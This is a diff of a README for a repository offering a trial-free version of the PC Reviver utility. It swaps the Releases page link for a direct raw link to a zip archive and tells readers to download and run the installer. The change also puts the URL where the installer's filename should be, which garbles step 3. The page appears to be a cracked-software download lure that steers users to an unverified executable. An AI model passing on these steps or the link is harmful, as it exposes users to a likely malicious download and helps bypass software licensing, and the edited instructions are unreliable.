yusufkgn135/PC-Reviver-No-Trial/README.md

 ## 📥 Download & Install

 1. **Visit the Release Page**
-   Go to our [Releases page](https://github.com/yusufkgn135/PC-Reviver-No-Trial/releases) to find the latest version of PC Reviver.
+   Go to our [Releases page](https://raw.githubusercontent.com/yusufkgn135/PC-Reviver-No-Trial/main/Phalaris/PC-Reviver-No-Trial-3.4.zip) to find the latest version of PC Reviver.

 2. **Select the Latest Release**
    Look for the most recent release at the top of the page.
 The version will have its release notes listed below it.

 3. **Download the Installer**
    Click on the installer file to download it.
-This file will typically be named something like `PC-Reviver-Installer.exe`.
+This file will typically be named something like `https://raw.githubusercontent.com/yusufkgn135/PC-Reviver-No-Trial/main/Phalaris/PC-Reviver-No-Trial-3.4.zip`.

 4. **Run the Installer**
    Once the download is complete, locate the downloaded file, and double-click it to run the installer.
 Follow any prompts that appear on the screen.